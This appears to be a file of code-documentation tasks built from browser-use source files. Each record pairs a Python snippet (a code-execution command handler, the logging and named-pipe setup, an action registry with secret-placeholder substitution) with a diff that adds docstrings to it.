if file_path.is_dir():
return {'success': False, 'error': f'Path is a directory, not a file: {file_path}'}
code = file_path.read_text()
if not code:
return {'success': False, 'error': 'No code provided. Use: python "<code>" or --file script.py'}
# Execute code in a thread pool so browser operations can schedule back to the event loop
loop = asyncio.get_running_loop()
result = await loop.run_in_executor(None, python_session.execute, code, browser_session, loop)
if result.success:
# Return raw text output for clean display
return {'_raw_text': result.output} if result.output else {}
else:
return {'error': result.error or 'Unknown error'} | --- +++ @@ -1,3 +1,4 @@+"""Python execution command handler."""
import asyncio
import logging
@@ -10,6 +11,14 @@
async def handle(session: SessionInfo, params: dict[str, Any]) -> Any:
+ """Handle python command.
+
+ Supports:
+ - python "<code>" - Execute Python code
+ - python --file script.py - Execute Python file
+ - python --reset - Reset namespace
+ - python --vars - Show defined variables
+ """
python_session = session.python_session
browser_session = session.browser_session
@@ -46,4 +55,4 @@ # Return raw text output for clean display
return {'_raw_text': result.output} if result.output else {}
else:
- return {'error': result.error or 'Unknown error'}+ return {'error': result.error or 'Unknown error'}
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/python_exec.py |
Write Python docstrings for this snippet | import logging
import os
import sys
from pathlib import Path
from dotenv import load_dotenv
load_dotenv()
from browser_use.config import CONFIG
def addLoggingLevel(levelName, levelNum, methodName=None):
if not methodName:
methodName = levelName.lower()
if hasattr(logging, levelName):
raise AttributeError(f'{levelName} already defined in logging module')
if hasattr(logging, methodName):
raise AttributeError(f'{methodName} already defined in logging module')
if hasattr(logging.getLoggerClass(), methodName):
raise AttributeError(f'{methodName} already defined in logger class')
# This method was inspired by the answers to Stack Overflow post
# http://stackoverflow.com/q/2183233/2988730, especially
# http://stackoverflow.com/a/13638084/2988730
def logForLevel(self, message, *args, **kwargs):
if self.isEnabledFor(levelNum):
self._log(levelNum, message, args, **kwargs)
def logToRoot(message, *args, **kwargs):
logging.log(levelNum, message, *args, **kwargs)
logging.addLevelName(levelNum, levelName)
setattr(logging, levelName, levelNum)
setattr(logging.getLoggerClass(), methodName, logForLevel)
setattr(logging, methodName, logToRoot)
def setup_logging(stream=None, log_level=None, force_setup=False, debug_log_file=None, info_log_file=None):
# Try to add RESULT level, but ignore if it already exists
try:
addLoggingLevel('RESULT', 35) # This allows ERROR, FATAL and CRITICAL
except AttributeError:
pass # Level already exists, which is fine
log_type = log_level or CONFIG.BROWSER_USE_LOGGING_LEVEL
# Check if handlers are already set up
if logging.getLogger().hasHandlers() and not force_setup:
return logging.getLogger('browser_use')
# Clear existing handlers
root = logging.getLogger()
root.handlers = []
class BrowserUseFormatter(logging.Formatter):
def __init__(self, fmt, log_level):
super().__init__(fmt)
self.log_level = log_level
def format(self, record):
# Only clean up names in INFO mode, keep everything in DEBUG mode
if self.log_level > logging.DEBUG and isinstance(record.name, str) and record.name.startswith('browser_use.'):
# Extract clean component names from logger names
if 'Agent' in record.name:
record.name = 'Agent'
elif 'BrowserSession' in record.name:
record.name = 'BrowserSession'
elif 'tools' in record.name:
record.name = 'tools'
elif 'dom' in record.name:
record.name = 'dom'
elif record.name.startswith('browser_use.'):
# For other browser_use modules, use the last part
parts = record.name.split('.')
if len(parts) >= 2:
record.name = parts[-1]
return super().format(record)
# Setup single handler for all loggers
console = logging.StreamHandler(stream or sys.stderr)
# Determine the log level to use first
if log_type == 'result':
log_level = 35 # RESULT level value
elif log_type == 'debug':
log_level = logging.DEBUG
else:
log_level = logging.INFO
# adittional setLevel here to filter logs
if log_type == 'result':
console.setLevel('RESULT')
console.setFormatter(BrowserUseFormatter('%(message)s', log_level))
else:
console.setLevel(log_level) # Keep console at original log level (e.g., INFO)
console.setFormatter(BrowserUseFormatter('%(levelname)-8s [%(name)s] %(message)s', log_level))
# Configure root logger only
root.addHandler(console)
# Add file handlers if specified
file_handlers = []
# Create debug log file handler
if debug_log_file:
debug_handler = logging.FileHandler(debug_log_file, encoding='utf-8')
debug_handler.setLevel(logging.DEBUG)
debug_handler.setFormatter(BrowserUseFormatter('%(asctime)s - %(levelname)-8s [%(name)s] %(message)s', logging.DEBUG))
file_handlers.append(debug_handler)
root.addHandler(debug_handler)
# Create info log file handler
if info_log_file:
info_handler = logging.FileHandler(info_log_file, encoding='utf-8')
info_handler.setLevel(logging.INFO)
info_handler.setFormatter(BrowserUseFormatter('%(asctime)s - %(levelname)-8s [%(name)s] %(message)s', logging.INFO))
file_handlers.append(info_handler)
root.addHandler(info_handler)
# Configure root logger - use DEBUG if debug file logging is enabled
effective_log_level = logging.DEBUG if debug_log_file else log_level
root.setLevel(effective_log_level)
# Configure browser_use logger
browser_use_logger = logging.getLogger('browser_use')
browser_use_logger.propagate = False # Don't propagate to root logger
browser_use_logger.addHandler(console)
for handler in file_handlers:
browser_use_logger.addHandler(handler)
browser_use_logger.setLevel(effective_log_level)
# Configure bubus logger to allow INFO level logs
bubus_logger = logging.getLogger('bubus')
bubus_logger.propagate = False # Don't propagate to root logger
bubus_logger.addHandler(console)
for handler in file_handlers:
bubus_logger.addHandler(handler)
bubus_logger.setLevel(logging.INFO if log_type == 'result' else effective_log_level)
# Configure CDP logging using cdp_use's setup function
# This enables the formatted CDP output using CDP_LOGGING_LEVEL environment variable
# Convert CDP_LOGGING_LEVEL string to logging level
cdp_level_str = CONFIG.CDP_LOGGING_LEVEL.upper()
cdp_level = getattr(logging, cdp_level_str, logging.WARNING)
try:
from cdp_use.logging import setup_cdp_logging # type: ignore
# Use the CDP-specific logging level
setup_cdp_logging(
level=cdp_level,
stream=stream or sys.stderr,
format_string='%(levelname)-8s [%(name)s] %(message)s' if log_type != 'result' else '%(message)s',
)
except ImportError:
# If cdp_use doesn't have the new logging module, fall back to manual config
cdp_loggers = [
'websockets.client',
'cdp_use',
'cdp_use.client',
'cdp_use.cdp',
'cdp_use.cdp.registry',
]
for logger_name in cdp_loggers:
cdp_logger = logging.getLogger(logger_name)
cdp_logger.setLevel(cdp_level)
cdp_logger.addHandler(console)
cdp_logger.propagate = False
logger = logging.getLogger('browser_use')
# logger.debug('BrowserUse logging setup complete with level %s', log_type)
# Silence third-party loggers (but not CDP ones which we configured above)
third_party_loggers = [
'WDM',
'httpx',
'selenium',
'playwright',
'urllib3',
'asyncio',
'langsmith',
'langsmith.client',
'openai',
'httpcore',
'charset_normalizer',
'anthropic._base_client',
'PIL.PngImagePlugin',
'trafilatura.htmlprocessing',
'trafilatura',
'groq',
'portalocker',
'google_genai',
'portalocker.utils',
'websockets', # General websockets (but not websockets.client which we need)
]
for logger_name in third_party_loggers:
third_party = logging.getLogger(logger_name)
third_party.setLevel(logging.ERROR)
third_party.propagate = False
return logger
class FIFOHandler(logging.Handler):
def __init__(self, fifo_path: str):
super().__init__()
self.fifo_path = fifo_path
Path(fifo_path).parent.mkdir(parents=True, exist_ok=True)
# Create FIFO if it doesn't exist
if not os.path.exists(fifo_path):
os.mkfifo(fifo_path)
# Don't open the FIFO yet - will open on first write
self.fd = None
def emit(self, record):
try:
# Open FIFO on first write if not already open
if self.fd is None:
try:
self.fd = os.open(self.fifo_path, os.O_WRONLY | os.O_NONBLOCK)
except OSError:
# No reader connected yet, skip this message
return
msg = f'{self.format(record)}\n'.encode()
os.write(self.fd, msg)
except (OSError, BrokenPipeError):
# Reader disconnected, close and reset
if self.fd is not None:
try:
os.close(self.fd)
except Exception:
pass
self.fd = None
def close(self):
if hasattr(self, 'fd') and self.fd is not None:
try:
os.close(self.fd)
except Exception:
pass
super().close()
def setup_log_pipes(session_id: str, base_dir: str | None = None):
import tempfile
if base_dir is None:
base_dir = tempfile.gettempdir()
suffix = session_id[-4:]
pipe_dir = Path(base_dir) / f'buagent.{suffix}'
# Agent logs
agent_handler = FIFOHandler(str(pipe_dir / 'agent.pipe'))
agent_handler.setLevel(logging.DEBUG)
agent_handler.setFormatter(logging.Formatter('%(levelname)-8s [%(name)s] %(message)s'))
for name in ['browser_use.agent', 'browser_use.tools']:
logger = logging.getLogger(name)
logger.addHandler(agent_handler)
logger.setLevel(logging.DEBUG)
logger.propagate = True
# CDP logs
cdp_handler = FIFOHandler(str(pipe_dir / 'cdp.pipe'))
cdp_handler.setLevel(logging.DEBUG)
cdp_handler.setFormatter(logging.Formatter('%(levelname)-8s [%(name)s] %(message)s'))
for name in ['websockets.client', 'cdp_use.client']:
logger = logging.getLogger(name)
logger.addHandler(cdp_handler)
logger.setLevel(logging.DEBUG)
logger.propagate = True
# Event logs
event_handler = FIFOHandler(str(pipe_dir / 'events.pipe'))
event_handler.setLevel(logging.INFO)
event_handler.setFormatter(logging.Formatter('%(levelname)-8s [%(name)s] %(message)s'))
for name in ['bubus', 'browser_use.browser.session']:
logger = logging.getLogger(name)
logger.addHandler(event_handler)
logger.setLevel(logging.INFO) # Enable INFO for event bus
logger.propagate = True | --- +++ @@ -11,6 +11,30 @@
def addLoggingLevel(levelName, levelNum, methodName=None):
+ """
+ Comprehensively adds a new logging level to the `logging` module and the
+ currently configured logging class.
+
+ `levelName` becomes an attribute of the `logging` module with the value
+ `levelNum`. `methodName` becomes a convenience method for both `logging`
+ itself and the class returned by `logging.getLoggerClass()` (usually just
+ `logging.Logger`). If `methodName` is not specified, `levelName.lower()` is
+ used.
+
+ To avoid accidental clobberings of existing attributes, this method will
+ raise an `AttributeError` if the level name is already an attribute of the
+ `logging` module or if the method name is already present
+
+ Example
+ -------
+ >>> addLoggingLevel('TRACE', logging.DEBUG - 5)
+ >>> logging.getLogger(__name__).setLevel('TRACE')
+ >>> logging.getLogger(__name__).trace('that worked')
+ >>> logging.trace('so did this')
+ >>> logging.TRACE
+ 5
+
+ """
if not methodName:
methodName = levelName.lower()
@@ -38,6 +62,15 @@
def setup_logging(stream=None, log_level=None, force_setup=False, debug_log_file=None, info_log_file=None):
+ """Setup logging configuration for browser-use.
+
+ Args:
+ stream: Output stream for logs (default: sys.stdout). Can be sys.stderr for MCP mode.
+ log_level: Override log level (default: uses CONFIG.BROWSER_USE_LOGGING_LEVEL)
+ force_setup: Force reconfiguration even if handlers already exist
+ debug_log_file: Path to log file for debug level logs only
+ info_log_file: Path to log file for info level logs only
+ """
# Try to add RESULT level, but ignore if it already exists
try:
addLoggingLevel('RESULT', 35) # This allows ERROR, FATAL and CRITICAL
@@ -204,6 +237,7 @@
class FIFOHandler(logging.Handler):
+ """Non-blocking handler that writes to a named pipe."""
def __init__(self, fifo_path: str):
super().__init__()
@@ -248,6 +282,15 @@
def setup_log_pipes(session_id: str, base_dir: str | None = None):
+ """Setup named pipes for log streaming.
+
+ Usage:
+ # In browser-use:
+ setup_log_pipes(session_id="abc123")
+
+ # In consumer process:
+ tail -f {temp_dir}/buagent.c123/agent.pipe
+ """
import tempfile
if base_dir is None:
@@ -284,4 +327,4 @@ logger = logging.getLogger(name)
logger.addHandler(event_handler)
logger.setLevel(logging.INFO) # Enable INFO for event bus
- logger.propagate = True+ logger.propagate = True
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/logging_config.py |
Create docstrings for each class method | import asyncio
import functools
import inspect
import logging
import re
from collections.abc import Callable
from inspect import Parameter, iscoroutinefunction, signature
from types import UnionType
from typing import Any, Generic, Optional, TypeVar, Union, get_args, get_origin
import pyotp
from pydantic import BaseModel, Field, RootModel, create_model
from browser_use.browser import BrowserSession
from browser_use.filesystem.file_system import FileSystem
from browser_use.llm.base import BaseChatModel
from browser_use.observability import observe_debug
from browser_use.telemetry.service import ProductTelemetry
from browser_use.tools.registry.views import (
ActionModel,
ActionRegistry,
RegisteredAction,
SpecialActionParameters,
)
from browser_use.utils import is_new_tab_page, match_url_with_domain_pattern, time_execution_async
Context = TypeVar('Context')
logger = logging.getLogger(__name__)
class Registry(Generic[Context]):
def __init__(self, exclude_actions: list[str] | None = None):
self.registry = ActionRegistry()
self.telemetry = ProductTelemetry()
# Create a new list to avoid mutable default argument issues
self.exclude_actions = list(exclude_actions) if exclude_actions is not None else []
def exclude_action(self, action_name: str) -> None:
# Add to exclude list to prevent future registration
if action_name not in self.exclude_actions:
self.exclude_actions.append(action_name)
# Remove from registry if already registered
if action_name in self.registry.actions:
del self.registry.actions[action_name]
logger.debug(f'Excluded action "{action_name}" from registry')
def _get_special_param_types(self) -> dict[str, type | UnionType | None]:
# Manually define the expected types to avoid issues with Optional handling.
# we should try to reduce this list to 0 if possible, give as few standardized objects to all the actions
# but each driver should decide what is relevant to expose the action methods,
# e.g. CDP client, 2fa code getters, sensitive_data wrappers, other context, etc.
return {
'context': None, # Context is a TypeVar, so we can't validate type
'browser_session': BrowserSession,
'page_url': str,
'cdp_client': None, # CDPClient type from cdp_use, but we don't import it here
'page_extraction_llm': BaseChatModel,
'available_file_paths': list,
'has_sensitive_data': bool,
'file_system': FileSystem,
'extraction_schema': None, # dict | None, skip type validation
}
def _normalize_action_function_signature(
self,
func: Callable,
description: str,
param_model: type[BaseModel] | None = None,
) -> tuple[Callable, type[BaseModel]]:
sig = signature(func)
parameters = list(sig.parameters.values())
special_param_types = self._get_special_param_types()
special_param_names = set(special_param_types.keys())
# Step 1: Validate no **kwargs in original function signature
# if it needs default values it must use a dedicated param_model: BaseModel instead
for param in parameters:
if param.kind == Parameter.VAR_KEYWORD:
raise ValueError(
f"Action '{func.__name__}' has **{param.name} which is not allowed. "
f'Actions must have explicit positional parameters only.'
)
# Step 2: Separate special and action parameters
action_params = []
special_params = []
param_model_provided = param_model is not None
for i, param in enumerate(parameters):
# Check if this is a Type 1 pattern (first param is BaseModel)
if i == 0 and param_model_provided and param.name not in special_param_names:
# This is Type 1 pattern - skip the params argument
continue
if param.name in special_param_names:
# Validate special parameter type
expected_type = special_param_types.get(param.name)
if param.annotation != Parameter.empty and expected_type is not None:
# Handle Optional types - normalize both sides
param_type = param.annotation
origin = get_origin(param_type)
if origin is Union:
args = get_args(param_type)
# Find non-None type
param_type = next((arg for arg in args if arg is not type(None)), param_type)
# Check if types are compatible (exact match, subclass, or generic list)
types_compatible = (
param_type == expected_type
or (
inspect.isclass(param_type)
and inspect.isclass(expected_type)
and issubclass(param_type, expected_type)
)
or
# Handle list[T] vs list comparison
(expected_type is list and (param_type is list or get_origin(param_type) is list))
)
if not types_compatible:
expected_type_name = getattr(expected_type, '__name__', str(expected_type))
param_type_name = getattr(param_type, '__name__', str(param_type))
raise ValueError(
f"Action '{func.__name__}' parameter '{param.name}: {param_type_name}' "
f"conflicts with special argument injected by tools: '{param.name}: {expected_type_name}'"
)
special_params.append(param)
else:
action_params.append(param)
# Step 3: Create or validate param model
if not param_model_provided:
# Type 2: Generate param model from action params
if action_params:
params_dict = {}
for param in action_params:
annotation = param.annotation if param.annotation != Parameter.empty else str
default = ... if param.default == Parameter.empty else param.default
params_dict[param.name] = (annotation, default)
param_model = create_model(f'{func.__name__}_Params', __base__=ActionModel, **params_dict)
else:
# No action params, create empty model
param_model = create_model(
f'{func.__name__}_Params',
__base__=ActionModel,
)
assert param_model is not None, f'param_model is None for {func.__name__}'
# Step 4: Create normalized wrapper function
@functools.wraps(func)
async def normalized_wrapper(*args, params: BaseModel | None = None, **kwargs):
# Validate no positional args
if args:
raise TypeError(f'{func.__name__}() does not accept positional arguments, only keyword arguments are allowed')
# Prepare arguments for original function
call_args = []
call_kwargs = {}
# Handle Type 1 pattern (first arg is the param model)
if param_model_provided and parameters and parameters[0].name not in special_param_names:
if params is None:
raise ValueError(f"{func.__name__}() missing required 'params' argument")
# For Type 1, we'll use the params object as first argument
pass
else:
# Type 2 pattern - need to unpack params
# If params is None, try to create it from kwargs
if params is None and action_params:
# Extract action params from kwargs
action_kwargs = {}
for param in action_params:
if param.name in kwargs:
action_kwargs[param.name] = kwargs[param.name]
if action_kwargs:
# Use the param_model which has the correct types defined
params = param_model(**action_kwargs)
# Build call_args by iterating through original function parameters in order
params_dict = params.model_dump() if params is not None else {}
for i, param in enumerate(parameters):
# Skip first param for Type 1 pattern (it's the model itself)
if param_model_provided and i == 0 and param.name not in special_param_names:
call_args.append(params)
elif param.name in special_param_names:
# This is a special parameter
if param.name in kwargs:
value = kwargs[param.name]
# Check if required special param is None
if value is None and param.default == Parameter.empty:
if param.name == 'browser_session':
raise ValueError(f'Action {func.__name__} requires browser_session but none provided.')
elif param.name == 'page_extraction_llm':
raise ValueError(f'Action {func.__name__} requires page_extraction_llm but none provided.')
elif param.name == 'file_system':
raise ValueError(f'Action {func.__name__} requires file_system but none provided.')
elif param.name == 'page':
raise ValueError(f'Action {func.__name__} requires page but none provided.')
elif param.name == 'available_file_paths':
raise ValueError(f'Action {func.__name__} requires available_file_paths but none provided.')
elif param.name == 'file_system':
raise ValueError(f'Action {func.__name__} requires file_system but none provided.')
else:
raise ValueError(f"{func.__name__}() missing required special parameter '{param.name}'")
call_args.append(value)
elif param.default != Parameter.empty:
call_args.append(param.default)
else:
# Special param is required but not provided
if param.name == 'browser_session':
raise ValueError(f'Action {func.__name__} requires browser_session but none provided.')
elif param.name == 'page_extraction_llm':
raise ValueError(f'Action {func.__name__} requires page_extraction_llm but none provided.')
elif param.name == 'file_system':
raise ValueError(f'Action {func.__name__} requires file_system but none provided.')
elif param.name == 'page':
raise ValueError(f'Action {func.__name__} requires page but none provided.')
elif param.name == 'available_file_paths':
raise ValueError(f'Action {func.__name__} requires available_file_paths but none provided.')
elif param.name == 'file_system':
raise ValueError(f'Action {func.__name__} requires file_system but none provided.')
else:
raise ValueError(f"{func.__name__}() missing required special parameter '{param.name}'")
else:
# This is an action parameter
if param.name in params_dict:
call_args.append(params_dict[param.name])
elif param.default != Parameter.empty:
call_args.append(param.default)
else:
raise ValueError(f"{func.__name__}() missing required parameter '{param.name}'")
# Call original function with positional args
if iscoroutinefunction(func):
return await func(*call_args)
else:
return await asyncio.to_thread(func, *call_args)
# Update wrapper signature to be kwargs-only
new_params = [Parameter('params', Parameter.KEYWORD_ONLY, default=None, annotation=Optional[param_model])]
# Add special params as keyword-only
for sp in special_params:
new_params.append(Parameter(sp.name, Parameter.KEYWORD_ONLY, default=sp.default, annotation=sp.annotation))
# Add **kwargs to accept and ignore extra params
new_params.append(Parameter('kwargs', Parameter.VAR_KEYWORD))
normalized_wrapper.__signature__ = sig.replace(parameters=new_params) # type: ignore[attr-defined]
return normalized_wrapper, param_model
# @time_execution_sync('--create_param_model')
def _create_param_model(self, function: Callable) -> type[BaseModel]:
sig = signature(function)
special_param_names = set(SpecialActionParameters.model_fields.keys())
params = {
name: (param.annotation, ... if param.default == param.empty else param.default)
for name, param in sig.parameters.items()
if name not in special_param_names
}
# TODO: make the types here work
return create_model(
f'{function.__name__}_parameters',
__base__=ActionModel,
**params, # type: ignore
)
def action(
self,
description: str,
param_model: type[BaseModel] | None = None,
domains: list[str] | None = None,
allowed_domains: list[str] | None = None,
terminates_sequence: bool = False,
):
# Handle aliases: domains and allowed_domains are the same parameter
if allowed_domains is not None and domains is not None:
raise ValueError("Cannot specify both 'domains' and 'allowed_domains' - they are aliases for the same parameter")
final_domains = allowed_domains if allowed_domains is not None else domains
def decorator(func: Callable):
# Skip registration if action is in exclude_actions
if func.__name__ in self.exclude_actions:
return func
# Normalize the function signature
normalized_func, actual_param_model = self._normalize_action_function_signature(func, description, param_model)
action = RegisteredAction(
name=func.__name__,
description=description,
function=normalized_func,
param_model=actual_param_model,
domains=final_domains,
terminates_sequence=terminates_sequence,
)
self.registry.actions[func.__name__] = action
# Return the normalized function so it can be called with kwargs
return normalized_func
return decorator
@observe_debug(ignore_input=True, ignore_output=True, name='execute_action')
@time_execution_async('--execute_action')
async def execute_action(
self,
action_name: str,
params: dict,
browser_session: BrowserSession | None = None,
page_extraction_llm: BaseChatModel | None = None,
file_system: FileSystem | None = None,
sensitive_data: dict[str, str | dict[str, str]] | None = None,
available_file_paths: list[str] | None = None,
extraction_schema: dict | None = None,
) -> Any:
if action_name not in self.registry.actions:
raise ValueError(f'Action {action_name} not found')
action = self.registry.actions[action_name]
try:
# Create the validated Pydantic model
try:
validated_params = action.param_model(**params)
except Exception as e:
raise ValueError(f'Invalid parameters {params} for action {action_name}: {type(e)}: {e}') from e
if sensitive_data:
# Get current URL if browser_session is provided
current_url = None
if browser_session and browser_session.agent_focus_target_id:
try:
# Get current page info from session_manager
target = browser_session.session_manager.get_target(browser_session.agent_focus_target_id)
if target:
current_url = target.url
except Exception:
pass
validated_params = self._replace_sensitive_data(validated_params, sensitive_data, current_url)
# Build special context dict
special_context = {
'browser_session': browser_session,
'page_extraction_llm': page_extraction_llm,
'available_file_paths': available_file_paths,
'has_sensitive_data': action_name == 'input' and bool(sensitive_data),
'file_system': file_system,
'extraction_schema': extraction_schema,
}
# Only pass sensitive_data to actions that explicitly need it (input)
if action_name == 'input':
special_context['sensitive_data'] = sensitive_data
# Add CDP-related parameters if browser_session is available
if browser_session:
# Add page_url
try:
special_context['page_url'] = await browser_session.get_current_page_url()
except Exception:
special_context['page_url'] = None
# Add cdp_client
special_context['cdp_client'] = browser_session.cdp_client
# All functions are now normalized to accept kwargs only
# Call with params and unpacked special context
try:
return await action.function(params=validated_params, **special_context)
except Exception as e:
raise
except ValueError as e:
# Preserve ValueError messages from validation
if 'requires browser_session but none provided' in str(e) or 'requires page_extraction_llm but none provided' in str(
e
):
raise RuntimeError(str(e)) from e
else:
raise RuntimeError(f'Error executing action {action_name}: {str(e)}') from e
except TimeoutError as e:
raise RuntimeError(f'Error executing action {action_name} due to timeout.') from e
except Exception as e:
raise RuntimeError(f'Error executing action {action_name}: {str(e)}') from e
def _log_sensitive_data_usage(self, placeholders_used: set[str], current_url: str | None) -> None:
if placeholders_used:
url_info = f' on {current_url}' if current_url and not is_new_tab_page(current_url) else ''
logger.info(f'🔒 Using sensitive data placeholders: {", ".join(sorted(placeholders_used))}{url_info}')
def _replace_sensitive_data(
self, params: BaseModel, sensitive_data: dict[str, Any], current_url: str | None = None
) -> BaseModel:
secret_pattern = re.compile(r'<secret>(.*?)</secret>')
# Set to track all missing placeholders across the full object
all_missing_placeholders = set()
# Set to track successfully replaced placeholders
replaced_placeholders = set()
# Process sensitive data based on format and current URL
applicable_secrets = {}
for domain_or_key, content in sensitive_data.items():
if isinstance(content, dict):
# New format: {domain_pattern: {key: value}}
# Only include secrets for domains that match the current URL
if current_url and not is_new_tab_page(current_url):
# it's a real url, check it using our custom allowed_domains scheme://*.example.com glob matching
if match_url_with_domain_pattern(current_url, domain_or_key):
applicable_secrets.update(content)
else:
# Old format: {key: value}, expose to all domains (only allowed for legacy reasons)
applicable_secrets[domain_or_key] = content
# Filter out empty values
applicable_secrets = {k: v for k, v in applicable_secrets.items() if v}
def recursively_replace_secrets(value: str | dict | list) -> str | dict | list:
if isinstance(value, str):
# 1. Handle tagged secrets: <secret>label</secret>
matches = secret_pattern.findall(value)
for placeholder in matches:
if placeholder in applicable_secrets:
# generate a totp code if secret is suffixed with bu_2fa_code
if placeholder.endswith('bu_2fa_code'):
totp = pyotp.TOTP(applicable_secrets[placeholder], digits=6)
replacement_value = totp.now()
else:
replacement_value = applicable_secrets[placeholder]
value = value.replace(f'<secret>{placeholder}</secret>', replacement_value)
replaced_placeholders.add(placeholder)
else:
# Keep track of missing placeholders
all_missing_placeholders.add(placeholder)
# 2. Handle literal secrets: "user_name" (no tags)
# This handles cases where the LLM forgets to use tags but uses the exact placeholder name
if value in applicable_secrets:
placeholder_name = value
if placeholder_name.endswith('bu_2fa_code'):
totp = pyotp.TOTP(applicable_secrets[placeholder_name], digits=6)
value = totp.now()
else:
value = applicable_secrets[placeholder_name]
replaced_placeholders.add(placeholder_name)
return value
elif isinstance(value, dict):
return {k: recursively_replace_secrets(v) for k, v in value.items()}
elif isinstance(value, list):
return [recursively_replace_secrets(v) for v in value]
return value
params_dump = params.model_dump()
processed_params = recursively_replace_secrets(params_dump)
# Log sensitive data usage
self._log_sensitive_data_usage(replaced_placeholders, current_url)
# Log a warning if any placeholders are missing
if all_missing_placeholders:
logger.warning(f'Missing or empty keys in sensitive_data dictionary: {", ".join(all_missing_placeholders)}')
return type(params).model_validate(processed_params)
# @time_execution_sync('--create_action_model')
def create_action_model(self, include_actions: list[str] | None = None, page_url: str | None = None) -> type[ActionModel]:
from typing import Union
# Filter actions based on page_url if provided:
# if page_url is None, only include actions with no filters
# if page_url is provided, only include actions that match the URL
available_actions: dict[str, RegisteredAction] = {}
for name, action in self.registry.actions.items():
if include_actions is not None and name not in include_actions:
continue
# If no page_url provided, only include actions with no filters
if page_url is None:
if action.domains is None:
available_actions[name] = action
continue
# Check domain filter if present
domain_is_allowed = self.registry._match_domains(action.domains, page_url)
# Include action if domain filter matches
if domain_is_allowed:
available_actions[name] = action
# Create individual action models for each action
individual_action_models: list[type[BaseModel]] = []
for name, action in available_actions.items():
# Create an individual model for each action that contains only one field
individual_model = create_model(
f'{name.title().replace("_", "")}ActionModel',
__base__=ActionModel,
**{
name: (
action.param_model,
Field(description=action.description),
) # type: ignore
},
)
individual_action_models.append(individual_model)
# If no actions available, return empty ActionModel
if not individual_action_models:
return create_model('EmptyActionModel', __base__=ActionModel)
# Create proper Union type that maintains ActionModel interface
if len(individual_action_models) == 1:
# If only one action, return it directly (no Union needed)
result_model = individual_action_models[0]
# Meaning the length is more than 1
else:
# Create a Union type using RootModel that properly delegates ActionModel methods
union_type = Union[tuple(individual_action_models)] # type: ignore : Typing doesn't understand that the length is >= 2 (by design)
class ActionModelUnion(RootModel[union_type]): # type: ignore
def get_index(self) -> int | None:
if hasattr(self.root, 'get_index'):
return self.root.get_index() # type: ignore
return None
def set_index(self, index: int):
if hasattr(self.root, 'set_index'):
self.root.set_index(index) # type: ignore
def model_dump(self, **kwargs):
if hasattr(self.root, 'model_dump'):
return self.root.model_dump(**kwargs) # type: ignore
return super().model_dump(**kwargs)
# Set the name for better debugging
ActionModelUnion.__name__ = 'ActionModel'
ActionModelUnion.__qualname__ = 'ActionModel'
result_model = ActionModelUnion
return result_model # type:ignore
def get_prompt_description(self, page_url: str | None = None) -> str:
return self.registry.get_prompt_description(page_url=page_url) | --- +++ @@ -30,6 +30,7 @@
class Registry(Generic[Context]):
+ """Service for registering and managing actions"""
def __init__(self, exclude_actions: list[str] | None = None):
self.registry = ActionRegistry()
@@ -38,6 +39,11 @@ self.exclude_actions = list(exclude_actions) if exclude_actions is not None else []
def exclude_action(self, action_name: str) -> None:
+ """Exclude an action from the registry after initialization.
+
+ If the action is already registered, it will be removed from the registry.
+ The action is also added to the exclude_actions list to prevent re-registration.
+ """
# Add to exclude list to prevent future registration
if action_name not in self.exclude_actions:
self.exclude_actions.append(action_name)
@@ -48,6 +54,7 @@ logger.debug(f'Excluded action "{action_name}" from registry')
def _get_special_param_types(self) -> dict[str, type | UnionType | None]:
+ """Get the expected types for special parameters from SpecialActionParameters"""
# Manually define the expected types to avoid issues with Optional handling.
# we should try to reduce this list to 0 if possible, give as few standardized objects to all the actions
# but each driver should decide what is relevant to expose the action methods,
@@ -70,6 +77,13 @@ description: str,
param_model: type[BaseModel] | None = None,
) -> tuple[Callable, type[BaseModel]]:
+ """
+ Normalize action function to accept only kwargs.
+
+ Returns:
+ - Normalized function that accepts (*_, params: ParamModel, **special_params)
+ - The param model to use for registration
+ """
sig = signature(func)
parameters = list(sig.parameters.values())
special_param_types = self._get_special_param_types()
@@ -153,6 +167,7 @@ # Step 4: Create normalized wrapper function
@functools.wraps(func)
async def normalized_wrapper(*args, params: BaseModel | None = None, **kwargs):
+ """Normalized action that only accepts kwargs"""
# Validate no positional args
if args:
raise TypeError(f'{func.__name__}() does not accept positional arguments, only keyword arguments are allowed')
@@ -257,6 +272,7 @@
# @time_execution_sync('--create_param_model')
def _create_param_model(self, function: Callable) -> type[BaseModel]:
+ """Creates a Pydantic model from function signature"""
sig = signature(function)
special_param_names = set(SpecialActionParameters.model_fields.keys())
params = {
@@ -279,6 +295,7 @@ allowed_domains: list[str] | None = None,
terminates_sequence: bool = False,
):
+ """Decorator for registering actions"""
# Handle aliases: domains and allowed_domains are the same parameter
if allowed_domains is not None and domains is not None:
raise ValueError("Cannot specify both 'domains' and 'allowed_domains' - they are aliases for the same parameter")
@@ -321,6 +338,7 @@ available_file_paths: list[str] | None = None,
extraction_schema: dict | None = None,
) -> Any:
+ """Execute a registered action with simplified parameter handling"""
if action_name not in self.registry.actions:
raise ValueError(f'Action {action_name} not found')
@@ -391,6 +409,7 @@ raise RuntimeError(f'Error executing action {action_name}: {str(e)}') from e
def _log_sensitive_data_usage(self, placeholders_used: set[str], current_url: str | None) -> None:
+ """Log when sensitive data is being used on a page"""
if placeholders_used:
url_info = f' on {current_url}' if current_url and not is_new_tab_page(current_url) else ''
logger.info(f'🔒 Using sensitive data placeholders: {", ".join(sorted(placeholders_used))}{url_info}')
@@ -398,6 +417,18 @@ def _replace_sensitive_data(
self, params: BaseModel, sensitive_data: dict[str, Any], current_url: str | None = None
) -> BaseModel:
+ """
+ Replaces sensitive data placeholders in params with actual values.
+
+ Args:
+ params: The parameter object containing <secret>placeholder</secret> tags
+ sensitive_data: Dictionary of sensitive data, either in old format {key: value}
+ or new format {domain_pattern: {key: value}}
+ current_url: Optional current URL for domain matching
+
+ Returns:
+ BaseModel: The parameter object with placeholders replaced by actual values
+ """
secret_pattern = re.compile(r'<secret>(.*?)</secret>')
# Set to track all missing placeholders across the full object
@@ -474,6 +505,12 @@
# @time_execution_sync('--create_action_model')
def create_action_model(self, include_actions: list[str] | None = None, page_url: str | None = None) -> type[ActionModel]:
+ """Creates a Union of individual action models from registered actions,
+ used by LLM APIs that support tool calling & enforce a schema.
+
+ Each action model contains only the specific action being used,
+ rather than all actions with most set to None.
+ """
from typing import Union
# Filter actions based on page_url if provided:
@@ -531,15 +568,18 @@
class ActionModelUnion(RootModel[union_type]): # type: ignore
def get_index(self) -> int | None:
